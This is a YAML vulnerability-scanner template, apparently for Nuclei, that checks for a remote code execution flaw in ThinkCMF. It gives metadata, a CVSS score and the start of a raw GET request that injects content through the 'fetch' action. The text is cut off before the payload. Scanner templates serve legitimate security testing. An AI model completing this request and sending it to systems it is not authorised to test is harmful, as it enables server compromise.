id: thinkcmf-rce info: name: ThinkCMF - Remote Code Execution author: pikpikcu severity: critical description: ThinkCMF is susceptible to a remote code execution vulnerability. reference: - https://www.freebuf.com/vuls/217586.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 2 tags: thinkcmf,rce,intrusive http: - raw: - | GET /index.php?a=fetch&content={{url_encode('